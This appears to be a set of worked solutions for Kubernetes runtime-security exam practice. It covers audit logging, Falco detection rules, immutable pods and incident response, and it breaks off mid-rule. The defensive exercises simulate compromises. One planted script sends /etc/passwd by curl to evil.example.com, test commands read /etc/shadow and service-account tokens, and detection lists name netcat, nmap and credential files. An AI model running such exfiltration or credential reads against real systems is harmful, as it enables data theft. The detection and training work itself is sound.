Solutions: Monitoring, Logging and Runtime Security
INFO
These solutions provide step-by-step instructions for each practice question. Try to solve each question on your own before checking the solution. Each solution includes verification steps and exam tips.
Solution 1: Basic Audit Policy Creation
Step-by-Step
# Create the directory
sudo mkdir -p /etc/kubernetes/auditCreate the audit policy file at /etc/kubernetes/audit/policy.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
# Do not log RequestReceived stage
omitStages:
- "RequestReceived"
rules:
# Rule 1: Log all Secret operations at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Rule 2: Log namespace create and delete at RequestResponse level
- level: RequestResponse
resources:
- group: ""
resources: ["namespaces"]
verbs: ["create", "delete"]
# Rule 3: Catch-all -- log everything else at Metadata level
- level: MetadataVerification
# Validate the YAML syntax
python3 -c "import yaml; yaml.safe_load(open('/etc/kubernetes/audit/policy.yaml'))"Exam Tip
Always remember three things about audit policies:
- Rules are evaluated top-down -- first match wins
apiVersionmust beaudit.k8s.io/v1andkindmust bePolicy- Include a catch-all rule at the end to avoid silently dropping events
Solution 2: Enable Audit Logging on API Server
Step-by-Step
# Create the audit log directory
sudo mkdir -p /var/log/kubernetes/auditEdit the API server manifest at /etc/kubernetes/manifests/kube-apiserver.yaml:
sudo vi /etc/kubernetes/manifests/kube-apiserver.yamlAdd the following flags to the kube-apiserver command:
- --audit-policy-file=/etc/kubernetes/audit/policy.yaml
- --audit-log-path=/var/log/kubernetes/audit/audit.log
- --audit-log-maxage=30
- --audit-log-maxbackup=5
- --audit-log-maxsize=100Add the following volume mounts to the container:
volumeMounts:
# ... existing mounts ...
- name: audit-policy
mountPath: /etc/kubernetes/audit/policy.yaml
readOnly: true
- name: audit-log
mountPath: /var/log/kubernetes/auditAdd the following volumes to the pod spec:
volumes:
# ... existing volumes ...
- name: audit-policy
hostPath:
path: /etc/kubernetes/audit/policy.yaml
type: File
- name: audit-log
hostPath:
path: /var/log/kubernetes/audit
type: DirectoryOrCreateVerification
# Wait for the API server to restart (may take 30-60 seconds)
# Check API server status
kubectl get nodes
# If the API server does not come back, check the static pod logs:
# For Kind clusters:
docker exec kind-control-plane crictl logs $(docker exec kind-control-plane crictl ps -a --name kube-apiserver -q | head -1)
# Verify audit log is being written
ls -la /var/log/kubernetes/audit/audit.log
# Check that events are being recorded
tail -5 /var/log/kubernetes/audit/audit.log | jq .Common Mistakes
- Forgetting to add BOTH the volume and the volumeMount
- Using
type: Directoryinstead oftype: Filefor the policy file - Using
type: Directoryinstead oftype: DirectoryOrCreatefor the log directory - Typos in the mount path or host path
- Not making the policy file mount
readOnly: true
Solution 3: Advanced Audit Policy
Step-by-Step
Create /etc/kubernetes/audit/policy-advanced.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
# Omit RequestReceived stage globally
omitStages:
- "RequestReceived"
rules:
# Rule 1: Do NOT log get/list/watch on endpoints or services
- level: None
resources:
- group: ""
resources: ["endpoints", "services", "services/status"]
verbs: ["get", "list", "watch"]
# Rule 2: Do NOT log requests to non-resource URLs
- level: None
nonResourceURLs:
- "/api*"
- "/healthz*"
- "/version"
# Rule 3: Log Secret operations at Metadata level only
# (Never use Request/RequestResponse for Secrets -- it would log secret values)
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Rule 4: Log RBAC modifications at RequestResponse level
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
verbs: ["create", "update", "patch", "delete"]
# Rule 5: Log pods/exec, pods/attach, pods/portforward at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["pods/exec", "pods/attach", "pods/portforward"]
# Rule 6: Catch-all -- log everything else at Metadata level
- level: MetadataVerification
# Validate YAML
python3 -c "import yaml; yaml.safe_load(open('/etc/kubernetes/audit/policy-advanced.yaml'))"
echo "Policy file is valid YAML"Exam Tip
When creating an advanced audit policy, write rules in this order:
Nonerules first (what to exclude)- Specific high-detail rules (RequestResponse for RBAC)
- Specific medium-detail rules (Metadata for Secrets)
- Catch-all rule last (Metadata for everything else)
Solution 4: Audit Log Investigation
Step-by-Step
# Create investigation directory
mkdir -p /tmp/investigation
# Find the deletion event
cat /var/log/kubernetes/audit/audit.log | jq '
select(
.objectRef.resource == "deployments" and
.objectRef.name == "webapp" and
.objectRef.namespace == "production" and
.verb == "delete" and
.stage == "ResponseComplete"
)' > /tmp/investigation/deletion-event.json
# Extract key details
cat /tmp/investigation/deletion-event.json | jq '{
username: .user.username,
sourceIP: .sourceIPs[0],
timestamp: .requestReceivedTimestamp,
responseCode: .responseStatus.code
}'If No Audit Logs Exist Yet (Simulation)
# If you need to generate test data, first enable audit logging,
# then create and delete a test deployment:
kubectl create namespace production
kubectl create deployment webapp --image=nginx -n production
kubectl delete deployment webapp -n production
# Then run the investigation commands aboveExam Tip
Key jq filters for audit log investigation:
.objectRef.resource-- filter by resource type.objectRef.name-- filter by resource name.objectRef.namespace-- filter by namespace.verb-- filter by action (create, update, delete, get, etc.).user.username-- filter by who performed the action.sourceIPs-- filter by source IP
Solution 5: Falco Rule for Shell Detection
Step-by-Step
Create or edit /etc/falco/falco_rules.local.yaml:
- list: shell_binaries
items:
- bash
- sh
- dash
- zsh
- macro: container
condition: (container.id != host)
- macro: spawned_process
condition: (evt.type in (execve, execveat) and evt.dir=<)
- rule: Detect Shell in Container
desc: >
Detects when an interactive shell (bash, sh, dash, zsh) is
spawned inside any container.
condition: >
spawned_process and
container and
proc.name in (shell_binaries)
output: >
Shell spawned in container
(user=%user.name shell=%proc.name
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
cmdline=%proc.cmdline)
priority: WARNING
tags: [shell, container]# Validate the rule file
falco -V /etc/falco/falco_rules.local.yaml
# Restart Falco
sudo systemctl restart falco
# Check Falco is running
sudo systemctl status falcoTesting
# Create a test pod
kubectl run test-shell --image=nginx
# Wait for it to be ready
kubectl wait --for=condition=ready pod/test-shell
# Trigger the rule by exec-ing a shell
kubectl exec -it test-shell -- bash
# Check Falco alerts
sudo journalctl -u falco --since "2 minutes ago" | grep "Shell spawned"
# Clean up
kubectl delete pod test-shellSolution 6: Falco Rule for Sensitive File Access
Step-by-Step
Add to /etc/falco/falco_rules.local.yaml:
- rule: Shadow File Read in Container
desc: >
Detects when any process reads /etc/shadow inside a container.
This file contains password hashes and should not be read by
application processes.
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_read=true and
container.id != host and
fd.name=/etc/shadow
output: >
/etc/shadow read in container
(process=%proc.name user=%user.name
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: ERROR
tags: [filesystem, sensitive_files, container]# Validate and restart
falco -V /etc/falco/falco_rules.local.yaml
sudo systemctl restart falcoTesting
# Create a test pod
kubectl run test-shadow --image=nginx
# Wait for it to be ready
kubectl wait --for=condition=ready pod/test-shadow
# Trigger the rule
kubectl exec test-shadow -- cat /etc/shadow
# Check Falco alerts
sudo journalctl -u falco --since "2 minutes ago" | grep "shadow"
# Clean up
kubectl delete pod test-shadowSolution 7: Falco Rule for Package Manager Detection
Step-by-Step
Create /etc/falco/rules.d/package-manager.yaml:
- list: package_mgr_binaries
items:
- apt
- apt-get
- dpkg
- yum
- rpm
- pip
- pip3
- npm
- apk
- rule: Package Manager Launched in Container
desc: >
Detects execution of package management tools inside containers.
Containers should be immutable and not install packages at runtime.
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (package_mgr_binaries)
output: >
Package manager launched in container
(package_manager=%proc.name cmdline=%proc.cmdline
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: CRITICAL
tags: [package_manager, immutability, container]# Restart Falco to load the new rules file
sudo systemctl restart falco
# Verify the rules directory is in falco.yaml
grep "rules.d" /etc/falco/falco.yaml
# Should show: - /etc/falco/rules.d
# Verify Falco loaded the rule
sudo journalctl -u falco --since "1 minute ago" | grep -i "package"Testing
kubectl run test-pkg --image=nginx
kubectl wait --for=condition=ready pod/test-pkg
kubectl exec test-pkg -- apt-get update
sudo journalctl -u falco --since "2 minutes ago" | grep "Package manager"
kubectl delete pod test-pkgSolution 8: Investigate Falco Alerts
Step-by-Step
# Step 1: Check Falco alerts from the last hour
sudo journalctl -u falco --since "1 hour ago" --no-pager | \
grep -E "WARNING|ERROR|CRITICAL"
# Or if Falco outputs to a file:
tail -100 /var/log/falco/falco_alerts.log | grep "web-app"
# Step 2: Identify the container and process
# Look for container name, pod name, process name in the alert output
# Example alert:
# WARNING Shell spawned in container
# (user=root shell=bash container=web-app pod=web-app ns=default cmdline=bash)
# Step 3: Investigate the pod
kubectl get pod web-app -n default -o yaml
kubectl exec web-app -n default -- ps aux
# Step 4: Check /tmp directory
kubectl exec web-app -n default -- ls -la /tmp/
# Step 5: Record findings
mkdir -p /tmp/investigation
cat > /tmp/investigation/falco-findings.txt << 'EOF'
Falco Investigation Report
==========================
Date: $(date)
Pod: web-app
Namespace: default
Container: web-app
Findings:
1. Falco detected shell (bash) spawned in the container
2. Process running as root user
3. Files found in /tmp:
- (list files found)
4. Processes running:
- (list from ps aux output)
Recommendation:
- Apply readOnlyRootFilesystem to prevent filesystem modifications
- Investigate the source of shell access
- Review RBAC permissions for exec access to this pod
EOFSolution 9: Container Immutability - Fix a Pod
Step-by-Step
# First, check the current pod spec
kubectl get pod mutable-app -o yaml > /tmp/mutable-app-backup.yaml
# Get the image name
IMAGE=$(kubectl get pod mutable-app -o jsonpath='{.spec.containers[0].image}')
# Delete the existing pod
kubectl delete pod mutable-app
# Recreate with immutable settings
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: mutable-app
namespace: default
spec:
containers:
- name: app
image: $IMAGE
securityContext:
readOnlyRootFilesystem: true
volumeMounts:
- name: tmp
mountPath: /tmp
- name: var-cache
mountPath: /var/cache
volumes:
- name: tmp
emptyDir: {}
- name: var-cache
emptyDir: {}
EOFVerification
# Check the pod is running
kubectl get pod mutable-app
# Verify readOnlyRootFilesystem is set
kubectl get pod mutable-app -o jsonpath='{.spec.containers[0].securityContext.readOnlyRootFilesystem}'
# Should output: true
# Verify /tmp is writable
kubectl exec mutable-app -- touch /tmp/test-file
echo "tmp is writable: OK"
# Verify root filesystem is read-only
kubectl exec mutable-app -- touch /test-file 2>&1 || echo "Root filesystem is read-only: OK"Exam Tip
If the question says "same configuration," make sure to preserve the original image, labels, ports, and other settings. Use kubectl get pod -o yaml to capture the full spec before deleting.
Solution 10: Container Immutability - Nginx
Step-by-Step
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: immutable-nginx
namespace: default
spec:
containers:
- name: nginx
image: nginx:1.25
ports:
- containerPort: 80
securityContext:
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
volumeMounts:
- name: tmp
mountPath: /tmp
- name: var-run
mountPath: /var/run
- name: var-cache-nginx
mountPath: /var/cache/nginx
- name: var-log-nginx
mountPath: /var/log/nginx
volumes:
- name: tmp
emptyDir: {}
- name: var-run
emptyDir: {}
- name: var-cache-nginx
emptyDir: {}
- name: var-log-nginx
emptyDir: {}
EOFVerification
# Check pod is running
kubectl get pod immutable-nginx
kubectl wait --for=condition=ready pod/immutable-nginx
# Verify nginx is serving
kubectl exec immutable-nginx -- curl -s localhost:80 | head -5
# Verify root filesystem is read-only
kubectl exec immutable-nginx -- touch /usr/share/nginx/html/test.html 2>&1
# Should fail with "Read-only file system"
# Verify writable directories work
kubectl exec immutable-nginx -- touch /tmp/test
kubectl exec immutable-nginx -- touch /var/cache/nginx/test
echo "All verifications passed"Exam Tip
Nginx requires four writable directories: /tmp, /var/run (for PID file), /var/cache/nginx (for proxy cache), and /var/log/nginx (for access/error logs). Memorize these for the exam.
Solution 11: Forensic Investigation - Suspicious Container
Step-by-Step
# Step 1: Set up the scenario
kubectl create namespace investigation
kubectl run suspicious-app --image=nginx:1.25 -n investigation
kubectl wait --for=condition=ready pod/suspicious-app -n investigation
# Step 2: Simulate compromise
kubectl exec suspicious-app -n investigation -- bash -c "
apt-get update -qq && apt-get install -y -qq curl > /dev/null 2>&1
curl -s -o /tmp/payload http://example.com
echo 'malicious' > /tmp/backdoor.sh
chmod +x /tmp/backdoor.sh
"
# Step 3: Investigate from the host
mkdir -p /tmp/investigation
# For Kind cluster, exec into the node:
# docker exec -it kind-control-plane bash
# Find the container ID
CONTAINER_ID=$(crictl ps --name suspicious-app -q)
echo "Container ID: $CONTAINER_ID" | tee /tmp/investigation/forensics-report.txt
# Get host PID
PID=$(crictl inspect $CONTAINER_ID | jq .info.pid)
echo "Host PID: $PID" | tee -a /tmp/investigation/forensics-report.txt
# List processes
echo "=== Running Processes ===" | tee -a /tmp/investigation/forensics-report.txt
crictl exec $CONTAINER_ID ps aux | tee -a /tmp/investigation/forensics-report.txt
# Check /tmp directory
echo "=== Files in /tmp ===" | tee -a /tmp/investigation/forensics-report.txt
crictl exec $CONTAINER_ID ls -la /tmp/ | tee -a /tmp/investigation/forensics-report.txt
# Check for suspicious files
echo "=== Suspicious file content ===" | tee -a /tmp/investigation/forensics-report.txt
crictl exec $CONTAINER_ID cat /tmp/backdoor.sh | tee -a /tmp/investigation/forensics-report.txt
# Check environment
echo "=== Container Environment ===" | tee -a /tmp/investigation/forensics-report.txt
crictl inspect $CONTAINER_ID | jq '.info.config.envs' | tee -a /tmp/investigation/forensics-report.txt
# Alternative: Investigate via /proc from host
echo "=== Process via /proc ===" | tee -a /tmp/investigation/forensics-report.txt
cat /proc/$PID/cmdline | tr '\0' ' ' | tee -a /tmp/investigation/forensics-report.txt
echo "" | tee -a /tmp/investigation/forensics-report.txt
ls -la /proc/$PID/root/tmp/ | tee -a /tmp/investigation/forensics-report.txtSolution 12: Audit Log Analysis - Secret Access
Step-by-Step
mkdir -p /tmp/investigation
# Find all Secret get/list operations grouped by user
cat /var/log/kubernetes/audit/audit.log | jq -s '
[.[] | select(
.objectRef.resource == "secrets" and
(.verb == "get" or .verb == "list")
)] |
group_by(.user.username) |
map({
user: .[0].user.username,
count: length,
namespaces: [.[] | .objectRef.namespace] | unique,
secrets: [.[] | .objectRef.name // "all"] | unique
}) |
sort_by(-.count)
' > /tmp/investigation/secret-access.txt
# Find cross-namespace Secret access
cat /var/log/kubernetes/audit/audit.log | jq '
select(
.objectRef.resource == "secrets" and
(.verb == "get" or .verb == "list")
) | {
user: .user.username,
secret: .objectRef.name,
namespace: .objectRef.namespace,
sourceIP: .sourceIPs[0],
time: .requestReceivedTimestamp
}
' >> /tmp/investigation/secret-access.txt
echo "Analysis saved to /tmp/investigation/secret-access.txt"
cat /tmp/investigation/secret-access.txtExam Tip
When analyzing Secret access patterns, look for:
- Service accounts accessing Secrets outside their namespace
- Unusual users listing all Secrets (
.objectRef.nameis null for list operations) - High frequency of Secret reads from a single source
Solution 13: Behavioral Analytics - Lateral Movement Detection
Step-by-Step
Create /etc/falco/rules.d/lateral-movement.yaml:
# Rule 1: Detect service account token reads
- rule: Service Account Token Read
desc: >
Detects when a process inside a container reads the Kubernetes
service account token. This may indicate lateral movement
preparation.
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_read=true and
container.id != host and
fd.name startswith /var/run/secrets/kubernetes.io/serviceaccount/token
output: >
Service account token read in container
(process=%proc.name command=%proc.cmdline
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: WARNING
tags: [lateral_movement, credential_access, container]
# Rule 2: Detect network scanning tools
- list: network_scanning_tools
items:
- nmap
- masscan
- nc
- ncat
- netcat
- rule: Network Scanning Tool in Container
desc: >
Detects execution of network scanning tools inside containers.
This is a strong indicator of lateral movement attempts.
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (network_scanning_tools)
output: >
Network scanning tool launched in container
(tool=%proc.name cmdline=%proc.cmdline
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: CRITICAL
tags: [lateral_movement, network_scanning, container]# Restart Falco
sudo systemctl restart falco
# Verify rules are loaded
sudo journalctl -u falco --since "1 minute ago" | grep -i "rule"
# Test the token read rule
kubectl run test-lateral --image=nginx
kubectl wait --for=condition=ready pod/test-lateral
kubectl exec test-lateral -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Check alerts
sudo journalctl -u falco --since "2 minutes ago" | grep -i "service account token\|network scanning"
# Clean up
kubectl delete pod test-lateralSolution 14: Combined - Audit Policy and Investigation
Step-by-Step
Part 1: Create the audit policy
Create /etc/kubernetes/audit/incident-policy.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
omitStages:
- "RequestReceived"
rules:
# Log pods/exec at RequestResponse level
- level: RequestResponse
resources:
- group: ""
resources: ["pods/exec", "pods/attach"]
# Log Secret operations at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Log RBAC changes at RequestResponse level
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
verbs: ["create", "update", "patch", "delete"]
# Catch-all
- level: MetadataPart 2: Configure the API server
Edit /etc/kubernetes/manifests/kube-apiserver.yaml and add:
Flags:
- --audit-policy-file=/etc/kubernetes/audit/incident-policy.yaml
- --audit-log-path=/var/log/kubernetes/audit/incident.log
- --audit-log-maxage=30
- --audit-log-maxbackup=5
- --audit-log-maxsize=100Volume mounts:
- name: audit-policy
mountPath: /etc/kubernetes/audit/incident-policy.yaml
readOnly: true
- name: audit-log
mountPath: /var/log/kubernetes/auditVolumes:
- name: audit-policy
hostPath:
path: /etc/kubernetes/audit/incident-policy.yaml
type: File
- name: audit-log
hostPath:
path: /var/log/kubernetes/audit
type: DirectoryOrCreatePart 3: Verify
# Wait for API server restart
sleep 30
kubectl get nodes
# Create a secret
kubectl create secret generic test-secret --from-literal=key=value
# Create a test pod and exec into it
kubectl run audit-test --image=nginx
kubectl wait --for=condition=ready pod/audit-test
kubectl exec audit-test -- whoami
# Check audit log
tail -20 /var/log/kubernetes/audit/incident.log | jq '.verb + " " + .objectRef.resource'
# Verify Secret creation was logged
cat /var/log/kubernetes/audit/incident.log | jq 'select(.objectRef.resource=="secrets" and .objectRef.name=="test-secret")'
# Verify exec was logged
cat /var/log/kubernetes/audit/incident.log | jq 'select(.objectRef.subresource=="exec")'
# Clean up
kubectl delete pod audit-test
kubectl delete secret test-secretSolution 15: Immutability Enforcement with Pod Security Standards
Step-by-Step
# Step 1: Create namespace with restricted PSS
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
name: restricted-ns
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/enforce-version: latest
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
EOF
# Step 2: Attempt to create a non-compliant pod (should be rejected)
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: non-compliant
namespace: restricted-ns
spec:
containers:
- name: app
image: nginx:1.25
EOF
# This should be REJECTED with a message about violations
# Step 3: Create a compliant pod
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: compliant-pod
namespace: restricted-ns
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
seccompProfile:
type: RuntimeDefault
containers:
- name: app
image: python:3.11-slim
command: ["python", "-m", "http.server", "8080"]
securityContext:
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
capabilities:
drop:
- ALL
ports:
- containerPort: 8080
volumeMounts:
- name: tmp
mountPath: /tmp
volumes:
- name: tmp
emptyDir: {}
EOFVerification
# Verify the non-compliant pod was rejected
kubectl get pods -n restricted-ns
# Should NOT show "non-compliant"
# Verify the compliant pod is running
kubectl get pod compliant-pod -n restricted-ns
kubectl wait --for=condition=ready pod/compliant-pod -n restricted-ns --timeout=60s
# Verify security settings
kubectl get pod compliant-pod -n restricted-ns -o jsonpath='{.spec.containers[0].securityContext}' | jq .Exam Tip
The restricted PSS profile requires:
runAsNonRoot: trueallowPrivilegeEscalation: falsecapabilities.drop: [ALL]seccompProfile.type: RuntimeDefaultorLocalhost- No privileged containers
- No hostPath, hostNetwork, hostPID, hostIPC
Note: readOnlyRootFilesystem is NOT enforced by PSS, but is a security best practice.
Solution 16: Falco - Modify Output Format
Step-by-Step
# Edit Falco configuration
sudo vi /etc/falco/falco.yamlMake these changes in /etc/falco/falco.yaml:
# Enable JSON output
json_output: true
json_include_output_property: true
json_include_tags_property: true
# Keep stdout enabled
stdout_output:
enabled: true
# Enable file output
file_output:
enabled: true
keep_alive: false
filename: /var/log/falco/alerts.json# Create the output directory
sudo mkdir -p /var/log/falco
# Restart Falco
sudo systemctl restart falco
# Verify Falco is running
sudo systemctl status falcoTesting
# Create a test pod and trigger a shell alert
kubectl run test-json --image=nginx
kubectl wait --for=condition=ready pod/test-json
kubectl exec test-json -- bash -c "echo test"
# Check JSON output in the file
sleep 5
cat /var/log/falco/alerts.json | jq .
# Verify it is valid JSON
cat /var/log/falco/alerts.json | jq 'select(.output | contains("shell"))'
# Clean up
kubectl delete pod test-jsonSolution 17: Forensic Investigation - Network Analysis
Step-by-Step
# Step 1: Create the pod
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: network-suspect
namespace: default
labels:
app: network-suspect
spec:
containers:
- name: nginx
image: nginx:1.25
ports:
- containerPort: 80
EOF
kubectl wait --for=condition=ready pod/network-suspect
# Step 2: Simulate suspicious activity
kubectl exec network-suspect -- bash -c "apt-get update -qq && apt-get install -y -qq curl > /dev/null 2>&1"
kubectl exec network-suspect -- curl -s http://example.com > /dev/null
# Step 3: Investigate from the host
# For Kind: docker exec -it kind-control-plane bash
CONTAINER_ID=$(crictl ps --name network-suspect -q)
PID=$(crictl inspect $CONTAINER_ID | jq .info.pid)
echo "Container ID: $CONTAINER_ID"
echo "Host PID: $PID"
# Check active network connections
echo "=== Active Connections ==="
nsenter -t $PID -n ss -tuanp
# Check listening ports
echo "=== Listening Ports ==="
nsenter -t $PID -n ss -tlnp
# Check processes with network activity
echo "=== Processes ==="
crictl exec $CONTAINER_ID ps aux
# Step 4: Create isolating NetworkPolicy
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: isolate-network-suspect
namespace: default
spec:
podSelector:
matchLabels:
app: network-suspect
policyTypes:
- Ingress
- Egress
# No ingress or egress rules = deny all traffic
EOF
# Step 5: Verify isolation
kubectl exec network-suspect -- curl -s --connect-timeout 5 http://example.com 2>&1 || echo "Connection blocked: NetworkPolicy is working"Solution 18: sysdig Investigation
Step-by-Step
# Step 1: Create the pod
kubectl run monitored-app --image=nginx:1.25
kubectl wait --for=condition=ready pod/monitored-app
# Step 2: Write sysdig commands
mkdir -p /tmp/investigation
cat > /tmp/investigation/sysdig-commands.txt << 'EOF'
# Monitor all file open events in the monitored-app container
sysdig evt.type in (open, openat, openat2) and container.name=monitored-app
# With formatted output:
sysdig -p "%evt.time %proc.name %fd.name" "evt.type in (open, openat, openat2) and container.name=monitored-app"
# Monitor all process execution events in the monitored-app container
sysdig evt.type in (execve, execveat) and container.name=monitored-app
# With formatted output:
sysdig -p "%evt.time %proc.name %proc.cmdline" "evt.type in (execve, execveat) and evt.dir=< and container.name=monitored-app"
# Monitor all network connection events in the monitored-app container
sysdig evt.type=connect and container.name=monitored-app
# With formatted output:
sysdig -p "%evt.time %proc.name %fd.name" "evt.type=connect and evt.dir=< and container.name=monitored-app"
# Comprehensive monitoring (all three in one command):
sysdig -p "%evt.time %evt.type %proc.name %proc.cmdline %fd.name" "container.name=monitored-app and (evt.type in (open, openat, execve, connect))"
# Using spy_users chisel to see all commands:
sysdig -c spy_users container.name=monitored-app
EOF
echo "Commands saved to /tmp/investigation/sysdig-commands.txt"
cat /tmp/investigation/sysdig-commands.txtExam Tip
You may not need to actually run sysdig in the exam -- you might just need to write the correct command. Key syntax to remember:
container.name=<name>to filter by containerevt.type=<type>to filter by syscall-p "<format>"for custom output format-c spy_usersfor the interactive commands chisel
Solution 19: Combined - Full Incident Response
Step-by-Step
# Step 1: Set up the scenario
kubectl create namespace production
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: app-server
namespace: production
labels:
app: app-server
spec:
containers:
- name: app
image: nginx:1.25
ports:
- containerPort: 80
EOF
kubectl wait --for=condition=ready pod/app-server -n production
# Step 2: Simulate compromise
kubectl exec app-server -n production -- bash -c "
echo '#!/bin/bash
curl http://evil.example.com/exfiltrate -d @/etc/passwd' > /tmp/malware.sh
chmod +x /tmp/malware.sh
apt-get update -qq > /dev/null 2>&1
apt-get install -y -qq curl > /dev/null 2>&1
"
# Step 3: Incident Response - Evidence Collection
mkdir -p /tmp/evidence
# Collect pod logs
kubectl logs app-server -n production > /tmp/evidence/pod-logs.txt
# Collect pod spec
kubectl get pod app-server -n production -o yaml > /tmp/evidence/pod-spec.yaml
# Collect running processes
kubectl exec app-server -n production -- ps aux > /tmp/evidence/processes.txt
# Collect filesystem changes
kubectl exec app-server -n production -- ls -la /tmp/ > /tmp/evidence/tmp-files.txt
kubectl exec app-server -n production -- cat /tmp/malware.sh > /tmp/evidence/malware-content.txt
# Collect network state
kubectl exec app-server -n production -- ss -tuanp > /tmp/evidence/network.txt 2>/dev/null || \
kubectl exec app-server -n production -- netstat -tuanp > /tmp/evidence/network.txt 2>/dev/null || \
echo "Network tools not available" > /tmp/evidence/network.txt
# Collect events
kubectl get events -n production --sort-by=.lastTimestamp > /tmp/evidence/events.txt
# Document timeline
cat > /tmp/evidence/timeline.txt << 'EOF'
Incident Timeline
=================
1. Pod app-server deployed in production namespace
2. Attacker gained shell access (detected by Falco or exec audit)
3. Attacker created malware script at /tmp/malware.sh
4. Attacker installed curl via apt-get (package manager activity detected)
5. Malware script designed to exfiltrate /etc/passwd to external server
Evidence Collected:
- Pod logs: pod-logs.txt
- Pod specification: pod-spec.yaml
- Running processes: processes.txt
- /tmp files: tmp-files.txt
- Malware content: malware-content.txt
- Network state: network.txt
- Events: events.txt
EOF
# Create isolating NetworkPolicy
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: isolate-app-server
namespace: production
spec:
podSelector:
matchLabels:
app: app-server
policyTypes:
- Ingress
- Egress
EOF
echo "Evidence collected and pod isolated"
# Step 4: Remediate
# Delete compromised pod
kubectl delete pod app-server -n production
# Recreate with immutable settings
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: app-server
namespace: production
labels:
app: app-server
spec:
containers:
- name: app
image: nginx:1.25
ports:
- containerPort: 80
securityContext:
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
volumeMounts:
- name: tmp
mountPath: /tmp
- name: var-run
mountPath: /var/run
- name: var-cache-nginx
mountPath: /var/cache/nginx
- name: var-log-nginx
mountPath: /var/log/nginx
volumes:
- name: tmp
emptyDir: {}
- name: var-run
emptyDir: {}
- name: var-cache-nginx
emptyDir: {}
- name: var-log-nginx
emptyDir: {}
EOF
# Verify remediated pod
kubectl wait --for=condition=ready pod/app-server -n production --timeout=60s
kubectl get pod app-server -n production
kubectl get pod app-server -n production -o jsonpath='{.spec.containers[0].securityContext}'
echo ""
echo "Remediation complete"Solution 20: Comprehensive Security Monitoring Setup
Step-by-Step
Part 1: Create the comprehensive audit policy
Create /etc/kubernetes/audit/comprehensive-policy.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
omitStages:
- "RequestReceived"
rules:
# Do NOT log get/list/watch on endpoints and services
- level: None
resources:
- group: ""
resources: ["endpoints", "services", "services/status"]
verbs: ["get", "list", "watch"]
# Do NOT log kube-proxy watch requests
- level: None
users: ["system:kube-proxy"]
verbs: ["watch"]
# Do NOT log requests to health/readiness endpoints
- level: None
nonResourceURLs:
- "/healthz*"
- "/readyz*"
- "/livez*"
# Log Secrets at Metadata level only
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Log RBAC changes at RequestResponse level
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
verbs: ["create", "update", "patch", "delete"]
# Log pods/exec and pods/portforward at Request level
- level: Request
resources:
- group: ""
resources: ["pods/exec", "pods/portforward"]
# Catch-all: log everything else at Metadata level
- level: MetadataPart 2: Create the comprehensive Falco rules
Create /etc/falco/rules.d/comprehensive.yaml:
# Lists
- list: shell_binaries
items: [bash, sh, dash, zsh]
- list: package_mgr_binaries
items: [apt, apt-get, dpkg, yum, rpm, pip, pip3, npm, apk]
- list: sensitive_files
items: [/etc/shadow, /etc/passwd]
# Rule 1: Shell spawning in containers
- rule: Shell Spawned in Container
desc: Detects shell execution inside containers
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (shell_binaries)
output: >
Shell spawned in container
(user=%user.name shell=%proc.name cmdline=%proc.cmdline
container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: WARNING
tags: [shell, container]
# Rule 2: Package manager in containers
- rule: Package Manager in Container
desc: Detects package manager execution inside containers
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (package_mgr_binaries)
output: >
Package manager in container
(manager=%proc.name cmdline=%proc.cmdline
container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: ERROR
tags: [package_manager, immutability, container]
# Rule 3: Sensitive file reads
- rule: Sensitive File Read in Container
desc: Detects reads of /etc/shadow or /etc/passwd in containers
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_read=true and
container.id != host and
fd.name in (sensitive_files)
output: >
Sensitive file read in container
(file=%fd.name process=%proc.name user=%user.name
